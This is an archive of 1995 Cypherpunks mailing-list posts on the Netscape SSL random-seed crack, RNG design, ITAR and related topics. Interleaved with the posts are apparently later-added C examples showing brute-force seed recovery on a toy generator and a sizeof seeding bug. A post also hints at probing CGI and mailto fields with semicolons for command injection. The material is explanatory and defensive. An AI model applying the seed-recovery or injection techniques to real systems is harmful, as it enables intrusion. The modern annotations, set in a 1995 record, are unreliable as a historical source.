0) Downright hostile - Not only does it _pretend_ to be Intelligent, while only really doing the right thing with its own proprietary data formats*, though generally doing something reasonable with uuencoded documents with names that it understands, but it chokes and dies on messages that have even moderately large amounts of simple, basic, non-attachmentized _text_, and if you _do_ try to package text up to send to some poor sucker who's stuck with one of these systems, it hands it to a brain-damaged user-friendly mouse-editor that _also_ chokes on more than 64KB of text.... [* where "the right thing" allows it to mindlessly run arbitrary code handed to it as macros in the proprietary data formats that the company encourages its users to use instead of real text....] #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:30:11 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:11 PDT Subject: NYT on Netscape Crack Message-ID: <199509190929.CAA23992@ix.ix.netcom.com> > The New York Times, September 19, 1995, pp. A1, D21. > ...... > "The good news and the bad news of the Internet is that > when you put something up there, many more people can test > it," said Mike Homer, the vice president of marketing at > Netscape. "You also give yourself the opportunity of having > people point things out which you can fix quickly." That's a good, and realistic, attitude. > Netscape officials said today that they would strengthen > the system, by making it significantly harder to determine > the random number at the heart of their coding system. They > said they would no longer disclose what data would be used > to generate the random numbers. I do hope this is just John Markoff's simplification of what Netscape's folks said and not an endorsement of security-by-obscurity. 
I realize that some data does need to be kept around on disk or in the program, since obtaining a lot of random bits at the beginning of every transaction either requires annoying user interactions or takes too long to get decent quality, and certainly this data ought to be kept private by the algorithms involved.

One concern I've had about the popular "crunch some bits repeatedly through MD5" approach to random number generation is that knowing one sample from the stream (e.g. by doing a transaction with the victim) gives you the rest of the stream. There's a way to improve that.

Let X(0) be some number you keep around from a previous session, modified by whatever hardware randomness is available, and seeded by user input the first time.
Let X(i) = MD5(X(i-1)).
Let Y(i) = hash(X(i)), where hash is something like MD5(key,X(i)).
Use Y(i) as the output random number.

This eliminates the ability to determine X(i) or Y(i+1) as a function of Y(i), since the search space of X(i) is presumably too large to reverse (unlike the number of bits you can cheaply get in one session). Keeping some of the bits of Y(i) around to use in addition to the other key for the hash, or to key the MD5(X(i-1)) with, may be useful as well.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Tue Sep 19 02:30:13 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 19 Sep 95 02:30:13 PDT
Subject: Caribbean Internet Services? (fwd)
Message-ID: <199509190929.CAA23997@ix.ix.netcom.com>

Tim wrote:
>>> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
>>> they were a few months ago.
The governments of the affected islands will have to make some tradeoffs - do they allow providers of these services to operate freely, bringing in new telecomm facilities so they can get the revenues from (let's keep the Minnesota AG happy) gambling and other private-communications trade, or do they leave their telecomm monopolies in place, so they can get the telecomm revenues which get into government coffers more quickly? Is there enough market to convince them to open up, which will attract more services? How much does being first matter? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:30:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:19 PDT Subject: Time release crypto Message-ID: <199509190930.CAA24047@ix.ix.netcom.com> >>What minimal requirements would be needed to support encrypted packets/files >>that a holder could only decrypt after a certain date/time? Technology can't solve the problem, only help a bit; algorithms aren't timebound. In particular, true security depends on only being able to decrypt if you have the correct information, and there's no way to create decryption information in the future from encryption pieces you have now without being able to create the same information now. Tim's 1993 article suggests spreading data around with > independent escrow agents who handle large volumes of messages > and agree to hold them for various amounts of time. and depending on reputations and market forces to ensure honesty. > The decryption key to the original message is itself broken >up into several or many pieces and scattered to a network of >"remailer"-like agents (they are essentially "remailers into the future," >by agreeing as part of their protocol to hold messages for some amount of time). 
What Tim almost, but not quite, mentions here is Shamir Secret Sharing - you can split messages into N pieces, of which any M can reconstruct the message and any M-1 don't contain enough information to resolve their equations uniquely, leaving you with _no_ known correct bits. Tim's message also talked about having lots of data flowing around in a remailer-like fashion, but that may not be untraceable by subpoenas, #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:55:00 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:55:00 PDT Subject: Fundamental Netscape hack Message-ID: <199509190954.CAA24686@ix.ix.netcom.com> Of course, one of the most serious security problems with Netscape servers is that they run on machines sitting out there on the Internet where anybody who can browse their services can attack them - that 128-bit bullet-proof iron-clad front door isn't much help if the garage door is unlocked because of some sendmail bug. For most web applications, the big security need is to send a chunk of encrypted data to some server that will decrypt it and get your credit-card number or whatever, but the standard SSL and S/HTTP protocols want to decrypt the data to plaintext on the Web server before it can do anything like that. (OK, I guess this doesn't win me a T-Shirt, since enough other people have said similar things, but do I at least get a gif of the shirt and a crayon so I can roll my own? :-) Good work, folks!
#--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From eay at mincom.oz.au Tue Sep 19 03:16:22 1995 From: eay at mincom.oz.au (Eric Young) Date: Tue, 19 Sep 95 03:16:22 PDT Subject: NYT on Netscape Crack In-Reply-To: <43lu3k$7q6@tera.mcom.com> Message-ID: On 19 Sep 1995, Jeff Weinstein wrote: > In article <199509190355.XAA01329 at frankenstein.piermont.com>, perry at piermont.com (Perry E. Metzger) writes: > > I suspect that there are far more flaws in Netscape. String buffer > > overflows are another good guess here -- they are probably rampant > > through the code both for the browser and the commerce server they .... > Sigh. For your information the security code for 1.x versions of > netscape was not even written by someone from NCSA. The current > security team (which does not include the person who did the 1.x > version) also does not include anyone from NCSA. While I can't I will defend Netscape's code on the point about the RNG even though I have not seen any. I assume the Netscape code is quite large and each release would have to pass various functionality tests. How can you test that the RND seeding is wrong? You have to actually look at the code; the numbers coming out are still random. As of last week I was told by Mike_Spreitzer.PARC at xerox.com that the random number generator seed routine in my DES library was only copying in 4 bytes of passed data instead of 8. Given des_cblock data;, it was memcpy(init,data,sizeof(data)); it should have been memcpy(init,data,sizeof(des_cblock)); Rather hard to notice unless you know that des_cblock is passed as a pointer, and even this can be compiler dependent. Now I had not noticed this; my library runs like a charm and things appear random from the random number generator. This sort of error can only be checked by reading the code and specifically looking at critical routines like this, the RNG seeding routines.
The advantage of my code being public is that someone like Mike can have a look and pick up problems like this. The moral of the story I suppose is to be paranoid about checking routines relating to RNG. What would be interesting is to see if packages like PEM use similar simple systems for generating random data. Any of the systems that do digital envelopes are relying on libraries to provide random data for encryption keys. At least with the old 'enter passwd' type encryption there was a bit of secret random data coming from a human, pity about packet watchers seeing those characters as they fly over the net :-) eric (who has also been burned by dodgy RNG seed routines in the past and so now uses a rather extreme system involving MD5 and lots of state :-). -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From descarte at mcqueen.com Tue Sep 19 03:37:34 1995 From: descarte at mcqueen.com (descarte at mcqueen.com) Date: Tue, 19 Sep 95 03:37:34 PDT Subject: Quick ITAR question.... Message-ID: <199509191040.LAA13613@alma.mcqueen.com> I've just about finished the perl SSLeay implementation and I was musing about how I would manage to do one for SSLref also....... Here's the situation: I'm in Britain, but I have access to a machine which I will develop on in the States. Can I develop Net::SSLref on this machine? My feeling is, no, since I'm not a US citizen ( does this matter with ITAR? ). Similarly, it could be construed that the characters constituting the source code are crossing the Atlantic to my machine here, albeit not being stored. Conversely, I'm not reading *all* the code, so I couldn't necessarily build SSLref from this action ( a parallel may be the export of 1/723 of PGP in a .sig! ) Any comments would be much appreciated. Thanks. -- Alligator Descartes | PGP Key available on request.
descarte at mcqueen.com | http://www.mcqueen.com/hermetica From aba at dcs.exeter.ac.uk Tue Sep 19 04:12:01 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 19 Sep 95 04:12:01 PDT Subject: NYT on Netscape Crack Message-ID: <28592.9509191106@exe.dcs.exeter.ac.uk> Eric Young writes: > I will defend Netscape's code on the point about the RNG even though > I have not seen any. I assume the Netscape code is quite large and > each release would have to pass various functionality tests. How can > you test that the RND seeding is wrong? You have to actually look > at the code; the numbers coming out are still random. As of last > week I was told by Mike_Spreitzer.PARC at xerox.com that the random > number generator seed routine in my DES library was only copying in > 4 bytes of passed data instead of 8. Given des_cblock data;, it was > > memcpy(init,data,sizeof(data)); > > it should have been > > memcpy(init,data,sizeof(des_cblock)); > > Rather hard to notice unless you know that des_cblock is passed as a > pointer, and even this can be compiler dependent. Sure that's hard to notice, but what you describe was an accident, i.e. the code wasn't working as you thought it was. The Netscape one, by the sound of it and of the earlier posts of the reverse-engineered random code, was working to spec; it was just a dumb spec. I felt sorry for Netscape when they got chosen as the example of an ITAR-crippled app to break, the breakers' intention obviously being to tar ITAR, but some of the bad publicity rubbing off on Netscape, who were obviously fully aware of the weakness of 40 bit keys. This one tho' sounds very much like it's due to sloppy design, which is inexcusable, especially given that they are going around selling the 128 bit RC4 browser to people who may have been relying on it, at its word, and presume the rest of the cryptographic system was up to a suitable standard to match 128 bit keys.
aka what's the point having 128 bit keys if you use a 32 bit, or 40 bit or 48 bit seed, which can be further narrowed with non-root access to the machine, and even with external info leaked by the machine. > The moral of the story I suppose is to be > paranoid about checking routines relating to RNG. Well that is a valid, and very good moral, but the Netscape story is a different story I think, as they knew what their code was doing, and somehow didn't think it was a problem, or didn't even pause to consider the random generation security. Reckon any bad publicity they get out of this one is entirely their own fault. The moral in Netscape's story is that closed systems are bad news. These things ideally need open review. And of course designing things with the expectation that they are secure with the *given* that the full algorithm is known. Real shame because the rest of the software is very innovative compared to other browsers, and apparently good quality. Also may be a setback for net commerce, which is bad news. Adam -- Munitions-T home page: http://www.obscura.com/~shirt/ #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 Message-ID: On the 18th, Tim May wrote: > > I wasn't saying they are all on the same footing, or are all separate and > compartmentalizable things. Clearly some of them are just slightly > different "flavors" of other things. I listed a bunch of them not as a > taxonomy or ontology, but as an illustration that there are many kinds of > financial dealings, many kinds of roles played. > > That the real world has so many flavors of financial things could of course > be due to inertia and ignorance, partly. But there are also different > functionalities, and costs. Fitting the different needs, the different > roles of the players.
I won't go on and on, as my last post on this I think > hit the main points, but consider how many flavors we have just of > "checks": the "ordinary" checks we write, counter checks, dual-endorser > checks, traveller's checks, and so on. (If you are arguing that only > "digital cash" is a real issue, and all other constructs are "small matters > of programming," then we disagree profoundly.) My mistake then. You obviously have in mind some things much more subtle and more logically removed from money, or currency, or even liquidity than what I thought you were referring to. I'm going back to reading the list in the mornings. --PJ . . . . > --Tim May > > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > From m5 at dev.tivoli.com Tue Sep 19 05:40:36 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Tue, 19 Sep 95 05:40:36 PDT Subject: NYT on Netscape Crack In-Reply-To: <43lu3k$7q6@tera.mcom.com> Message-ID: <9509191238.AA09042@alpha> Eric Young writes: > > Sigh. For your information the security code for 1.x versions of > > netscape was not even written by someone from NCSA. The current > > security team (which does not include the person who did the 1.x > > version) also does not include anyone from NCSA. While I can't > > I will defend Netscapes code on the point about the RNG even though I > have not seen any. I assume the Netscape code is quite large and each > release would have to pass various fuctionality tests. How can you test > that the RND seeding is wrong? The seeding isn't "wrong"; it's a design flaw. (At least that's my understanding; maybe I missed something.) 
> You have to actually look at the code, the number coming out are > still random. Two words: "design review". > This sort of error can only be checked by reading the code and > specifically looking at critical routines like this the RNG seeding > routines. Uhh... OK. Sounds like a plan to me. For critical pieces of code like that, having repeated exhaustive design/implementation reviews should be a matter of course. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From schneier at winternet.com Tue Sep 19 05:57:40 1995 From: schneier at winternet.com (Bruce Schneier) Date: Tue, 19 Sep 95 05:57:40 PDT Subject: Errors in Applied Cryptography, 2nd Edition Message-ID: <199509191257.HAA09502@icicle> I have taken a three stage approach to reducing the number of errors in the second edition: 1. Correct the errors from the first edition. 2. Ensure that I don't create any new errors while writing the new material for the second edition. 3. Make sure that additional errors don't creep in during the production of the second edition. In order.... I have done a lot more than incorporate all the corrections from the errata into the second edition. Minor things, too trivial to make the errata list, were also corrected. The first edition was translated into French, and the translator sent me hundreds of queries: things that were unclear, ambiguous, or erroneous. All of those queries resulted in changes to the second-edition manuscript. I was a lot more careful adding new material, reading it over several times to ensure accuracy. And a lot of other people read the chapters over, too. For the first edition, I asked about a dozen people to proofread the manuscript for me. 
Most people read the first chapters carefully, and then petered out somewhere in the middle. This time I asked about seventy people to each read a chapter (or two)--a chapter within their area of expertise. Each chapter was edited by at least two people, often more. Additionally, two people were paid to read the entire book for accuracy and comprehensibility. I learned a lot about the publishing process during the production of the first edition. For the first edition, I had no control of any of the production decisions. The copyeditor added errors to the manuscript. Some computer idiot lost all of my italics, boldface, superscripting, and subscripting while translating my files from my word processor to their page layout program. The proofreader didn't catch errors that the production people added. I had almost no time to review the manuscript at any of the stages. This time around I was able to choose my own copyeditor, proofreader, and indexer. In fact, there were two separate rounds of copyediting with two different copyeditors. The proofreader is not only the most meticulous proofreader I know, but someone who knows enough math to catch errors in the equations. I verified all file translations myself. And I reviewed the copyedited manuscript twice, and two separate passes of page proofs. I'm not stupid enough to state that the book is 100% error-free, but I am confident that there are far fewer errors in the second edition than there were in the first. I was embarrassed at some of the errors in the first edition, and I put a lot of effort into making sure it doesn't happen again. 
Bruce ************************************************************************** * Bruce Schneier * Counterpane Systems For a good prime, call 391581 * 2^216193 - 1 * schneier at counterpane.com ************************************************************************** From jya at pipeline.com Tue Sep 19 06:30:58 1995 From: jya at pipeline.com (John Young) Date: Tue, 19 Sep 95 06:30:58 PDT Subject: Unabomber ? Message-ID: <199509191330.JAA13584@pipe4.nyc.pipeline.com> Bill, Both the Times and Post report that only the Post is publishing the FC-piece. I'm scanning it now and will offer it in a while -- it's a long, long pole. I'll ask by this post if someone wants to offer it FTP, I can only do multiple e-mail bites from this hole. From frissell at panix.com Tue Sep 19 06:36:44 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Sep 95 06:36:44 PDT Subject: NYT on Netscape Crack Message-ID: <199509191336.JAA14981@panix.com> At 11:00 PM 9/18/95 -0400, John Young wrote: > The New York Times, September 19, 1995, pp. A1, D21. > > > Security Flaw Is Discovered In Software Used in Shopping > > By John Markoff On the Front Page, *above* the fold. Perhaps John was trying to make up for being scooped by the WSJ on the SSL Crack story. DCF "The key to the age may be this, or that, or the other, as the young orators describe; the key to all ages is-Imbecility; imbecility in the vast majority of men, at all times, and, even in heroes, in all but certain eminent moments; victims of gravity, custom, and fear." -- Ralph Waldo Emerson From adam at homeport.org Tue Sep 19 06:49:50 1995 From: adam at homeport.org (Adam Shostack) Date: Tue, 19 Sep 95 06:49:50 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190713.AAA01128@infinity.c2.org> Message-ID: <199509191349.JAA04365@homeport.org> | Buffer overflow seems like a much greater concern when dealing | with a server. Particularly one which is supposedly "secure", and | accessing "secured" documents. 
Even with the server running as | 'nobody' if someone can implement buffer overflow to get access to | documents they shouldn't then that would count as a pretty significant | hack. Don't forget system(), which was a major source of holes in the NCSA server. Also, CGI scripts, especially those that run under perl or sh, would be a good place to look for holes. Don't forget to see what happens when you put semi-colons in the data field of various fields, such as mailto:'s. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From sameer at c2.org Tue Sep 19 07:00:23 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:00:23 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509191349.JAA04365@homeport.org> Message-ID: <199509191355.GAA26932@infinity.c2.org> > Don't forget system(), which was a major source of holes in the NCSA server. > Also, CGI scripts, especially those that run under perl or sh, would be a good > place to look for holes. Don't forget to see what happens when you put > semi-colons in the data field of various fields, such as mailto:'s. > A CGI-script hole doesn't count as a netscape server hole. system() is probably pretty bad though. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Tue Sep 19 07:08:27 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:08:27 PDT Subject: NYT on Netscape Crack In-Reply-To: <28592.9509191106@exe.dcs.exeter.ac.uk> Message-ID: <199509191403.HAA27655@infinity.c2.org> > > Sure that's hard to notice, but what you describe was an accident, ie > the code wasn't working as you thought it was. > Also, the fact that the source isn't available meant that it took quite some work to reveal the hole. In Eric's case, with available source, his mistake was found and corrected. > > The moral in netscapes story is that closed systems are bad news. 
> These things ideally need open review. And of course designing things > with the expectation that they are secure with the *given* that the > full algorithm is known. Yes. > > Real shame because the rest of the software is very innovative > compared to other browsers, and apparently good quality. Also may be > a set back for net commerce, which is bad news. > Well if we hammer at 'em enough maybe they'll get their security fixed. I still use Netscape. I'm not going to stop using Netscape. (I'm not going to use Netscape for anything sensitive though, that's for sure.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From keelings at wu1.wl.aecl.ca Tue Sep 19 07:28:57 1995 From: keelings at wu1.wl.aecl.ca (S. Keeling) Date: Tue, 19 Sep 95 07:28:57 PDT Subject: Time release crypto Message-ID: <9509191427.AA23942@wu1.wl.aecl.ca> Incoming from Stephen D. Williams: > > What minimal requirements would be needed to support encrypted packets/files > that a holder could only decrypt after a certain date/time? > (Time Escrow?) How do you expect the system to reliably tell accurate time? What's to stop anyone from just resetting the clock to get at what they want? As always, physical access to the system breaks all security. -- "Remember, obsolescence (Win95) isn't an accident; it's an art form!" keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs From dl at hplyot.obspm.fr Tue Sep 19 07:32:20 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 19 Sep 95 07:32:20 PDT Subject: (Yet Another?) Netscape Crack Web page Message-ID: <9509191431.AA23188@hplyot.obspm.fr> I've been waiting to see here an announcement of some web page toward which to direct ppl that want more infos on the great (congrats) job from Ian and David, but as I saw none (maybe it's on its way, delays seem pretty high those days on the list mail, in that case, sorry...)
and someone asked me for more infos on my sources,... I've set up a small web page with some infos collected here on http://hplyot.obspm.fr/~dl/netscapesec/ It includes a few remote pointers, a copy of Ian's original post, the NYT article, the Wall Street Journal one, and... the source file that I received from a European source (and incidentally a summary from me in French) Please send me comments, corrections, additional pointers,... (it is not meant to be exhaustive anyway) Best regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven From eli at UX3.SP.CS.CMU.EDU Tue Sep 19 07:38:57 1995 From: eli at UX3.SP.CS.CMU.EDU (Eli Brandt) Date: Tue, 19 Sep 95 07:38:57 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com> Message-ID: <9509191438.AA16172@toad.com> > The New York Times, September 19, 1995, pp. A1, D21. ... > Netscape officials said today that they would strengthen > the system, by making it significantly harder to determine > the random number at the heart of their coding system. They > said they would no longer disclose what data would be used > to generate the random numbers. and from the WSJ article: > "The information we were using to create the key is now a known set of > information," said Jeffrey Treuhaft, security product manager for Netscape. It sounds as if Netscape thinks that public knowledge of the key generation is part of the problem. I hope somebody on the security team convinces management that entropy is more important than publicity. (This could be a result of journalistic cluelessness, but it came up in two independent articles. It's enough to worry me.) -- Eli Brandt eli+ at cs.cmu.edu (back from a nice long mailing-list vacation -- it's nice to see that cpunks is still at the cutting edge. for them what cares, I'm now a Ph.D. student at the CMU CS program...)
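The points made across this thread about the generator itself, Bill Stewart's construction (X(i) = MD5(X(i-1)) kept secret, Y(i) = MD5(key, X(i)) handed out), Adam Back's "what's the point of 128 bit keys with a 32 bit seed", Eli Brandt's "entropy is more important than publicity", and Erik Fair's idea of black-box statistical testing, as one added worked example. This is not code from any poster, from Eric Young's library or from Netscape. To stay stand-alone it uses a toy 64-bit mixing function in place of MD5; the 16-bit seed, the constants and every function and struct name are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Toy 64-bit mixing function standing in for MD5 so the block needs no
 * libcrypto. It is NOT a cryptographic hash; only the structure around it
 * (secret state vs. keyed output, seed space) is what the example shows.
 * Collisions among the handful of inputs used below are astronomically unlikely. */
static uint64_t toy_hash(const void *buf, size_t n) {
    const unsigned char *p = buf;
    uint64_t h = 0x9E3779B97F4A7C15ULL;
    for (size_t i = 0; i < n; i++) {
        h ^= p[i];
        h *= 0xFF51AFD7ED558CCDULL;
        h ^= h >> 33;
    }
    return h;
}
static uint64_t H1(uint64_t a) { return toy_hash(&a, sizeof a); }
static uint64_t H2(uint64_t a, uint64_t b) {        /* H(a || b) */
    unsigned char tmp[16];
    memcpy(tmp, &a, 8);
    memcpy(tmp + 8, &b, 8);
    return toy_hash(tmp, sizeof tmp);
}

/* "Crunch the state repeatedly through MD5": the state IS the output,
 * so one observed sample gives the whole rest of the stream. */
struct naive_rng { uint64_t x; };
static uint64_t naive_next(struct naive_rng *r) { r->x = H1(r->x); return r->x; }

/* Stewart's construction: X(i) = H(X(i-1)) never leaves the generator,
 * callers only ever see Y(i) = H(key || X(i)). */
struct keyed_rng { uint64_t x; uint64_t key; };
static uint64_t keyed_next(struct keyed_rng *r) {
    r->x = H1(r->x);
    return H2(r->key, r->x);
}

/* What an attacker who saw one naive output does to get the next one. */
static uint64_t attacker_predict(uint64_t observed) { return H1(observed); }

static int naive_is_predictable(void) {           /* 1: attack works */
    struct naive_rng r = { 0x1234 };
    uint64_t seen = naive_next(&r);
    return attacker_predict(seen) == naive_next(&r);
}
static int keyed_resists_prediction(void) {       /* 1: same attack fails */
    struct keyed_rng r = { 0x1234, 0xABCDEF0123ULL };
    uint64_t seen = keyed_next(&r);
    return attacker_predict(seen) != keyed_next(&r);
}

/* The other half of the thread: the construction is worthless when X(0) and
 * key are derived from a few bits. Constructed illustration: everything
 * derived from a 16-bit value (think time of day), algorithm fully public. */
#define SEED_BITS 16
static void seed_from_small(struct keyed_rng *r, uint32_t small) {
    r->x   = H2(0x5EEDULL, small);
    r->key = H2(0x4B45ULL, small);
}
/* Recover the seed from ONE output by trying all 2^SEED_BITS values; -1 if none. */
static long recover_seed(uint64_t observed_y0) {
    for (uint32_t s = 0; s < (1u << SEED_BITS); s++) {
        struct keyed_rng r;
        seed_from_small(&r, s);
        if (keyed_next(&r) == observed_y0) return (long)s;
    }
    return -1;
}
static long recovered_seed_for(uint32_t small) {
    struct keyed_rng r;
    seed_from_small(&r, small);
    return recover_seed(keyed_next(&r));
}

/* Black-box statistical check (fraction of one bits over n outputs). The
 * 16-bit-seeded generator passes it as well as any other: statistics see the
 * mixing, not the seed space, which is why Eric Young's "the numbers coming
 * out are still random" is no reassurance. */
static double weak_seed_bit_fraction(uint32_t small, size_t n) {
    struct keyed_rng r;
    seed_from_small(&r, small);
    size_t ones = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t y = keyed_next(&r);
        while (y) { ones += y & 1; y >>= 1; }
    }
    return (double)ones / (double)(n * 64);
}

int main(void) {
    printf("naive generator predictable from one sample: %d\n", naive_is_predictable());
    printf("keyed generator resists that attack:        %d\n", keyed_resists_prediction());
    printf("16-bit seed recovered from one output:       %ld\n", recovered_seed_for(4242));
    printf("one-bit fraction of the weakly seeded stream: %.4f\n", weak_seed_bit_fraction(4242, 2000));
    return 0;
}
```

The brute force takes all of a few milliseconds at 16 bits; the point scales, not the method. Note that recover_seed never needs to know key or X(0) separately: it only needs the public derivation and one output, which is exactly the situation a browser is in after one SSL handshake.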
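Eric Young's des_cblock seeding bug, as an added example that reproduces the mechanism so it can be seen and tested; this is not his library's code. It assumes des_cblock is `unsigned char[8]`, as the post implies, and adds a 16-byte digest type, the helper bytes_delivered and the function names as assumptions. Modern gcc and clang warn about sizeof on an array parameter (-Wsizeof-array-argument); the pragma silences that only so the buggy form compiles exactly as written.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* gcc and clang now flag sizeof applied to an array parameter. Disabled here
 * only so the buggy routine builds as it was written; in real code keep the
 * warning on, it is the cheapest check you have for this class of bug. */
#if defined(__GNUC__)
#pragma GCC diagnostic ignored "-Wsizeof-array-argument"
#endif

typedef unsigned char des_cblock[8];    /* assumed shape of libdes's type */
typedef unsigned char md5_digest[16];   /* same trap with a 16-byte digest */

/* BUGGY: 'data' is declared as an array, but a function parameter of array
 * type is adjusted to a pointer, so sizeof(data) is sizeof(unsigned char *):
 * 4 on the 32-bit hosts of 1995 (half the seed silently dropped), 8 on LP64
 * (where the bug hides, which is the "compiler dependent" part). */
static size_t seed_copy_buggy(unsigned char *init, des_cblock data) {
    memcpy(init, data, sizeof(data));
    return sizeof(data);
}
/* FIXED: name the type, not the parameter. */
static size_t seed_copy_fixed(unsigned char *init, des_cblock data) {
    memcpy(init, data, sizeof(des_cblock));
    return sizeof(des_cblock);
}
/* Same pair for a 16-byte digest: here the loss shows on 64-bit hosts too. */
static size_t digest_copy_buggy(unsigned char *out, md5_digest d) {
    memcpy(out, d, sizeof(d));
    return sizeof(d);
}
static size_t digest_copy_fixed(unsigned char *out, md5_digest d) {
    memcpy(out, d, sizeof(md5_digest));
    return sizeof(md5_digest);
}

typedef size_t (*copy_fn)(unsigned char *, unsigned char *);

/* Black-box check of a seed-copy routine: feed it n bytes of 0xFF and count
 * how many reach the destination. Anything below n is entropy thrown away
 * while the library still "runs like a charm". */
static size_t bytes_delivered(copy_fn copy, size_t n) {
    unsigned char src[16], dst[16];
    memset(src, 0xFF, sizeof src);
    memset(dst, 0x00, sizeof dst);
    copy(dst, src);
    size_t got = 0;
    for (size_t i = 0; i < n; i++) got += (dst[i] == 0xFF);
    return got;
}

int main(void) {
    printf("sizeof(unsigned char *) on this host: %zu\n", sizeof(unsigned char *));
    printf("des_cblock buggy/fixed: %zu/%zu of 8 bytes seeded\n",
           bytes_delivered(seed_copy_buggy, 8), bytes_delivered(seed_copy_fixed, 8));
    printf("md5_digest buggy/fixed: %zu/%zu of 16 bytes seeded\n",
           bytes_delivered(digest_copy_buggy, 16), bytes_delivered(digest_copy_fixed, 16));
    return 0;
}
```

The test below asserts the buggy routines deliver exactly sizeof(unsigned char *) bytes whatever the host, so it documents the dependence on pointer width rather than assuming a 32-bit machine.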
From sameer at c2.org Tue Sep 19 07:40:31 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:40:31 PDT Subject: articles Message-ID: <199509191435.HAA00275@infinity.c2.org> If you could, please send me the name of the reporter and contact information for any articles you see regarding the Netscape hack. Thanks, -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From patrick at Verity.COM Tue Sep 19 07:44:14 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Tue, 19 Sep 95 07:44:14 PDT Subject: Caribbean Internet Services? Message-ID: <9509191440.AA13167@cantina.verity.com> > (Yes, there have been more hurricanes this year than in most years...not > clear if it's just a Poisson fluctuation, or symptomatic of deeper weather > pattern changes.) > See September 95 Popular Science, article, "Hurricane Alert" in which the world's leading hurricane scientist says that we're only just seeing the beginning of several years of large numbers of large hurricanes. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From sameer at c2.org Tue Sep 19 07:44:49 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:44:49 PDT Subject: Fundamental Netscape hack In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com> Message-ID: <199509191439.HAA00501@infinity.c2.org> > (OK, I guess this doesn't win me a T-Shirt, since enough other people > have said similar things, but do I at least get a gif of the shirt > and a crayon so I can roll my own? :-) Good work, folks!
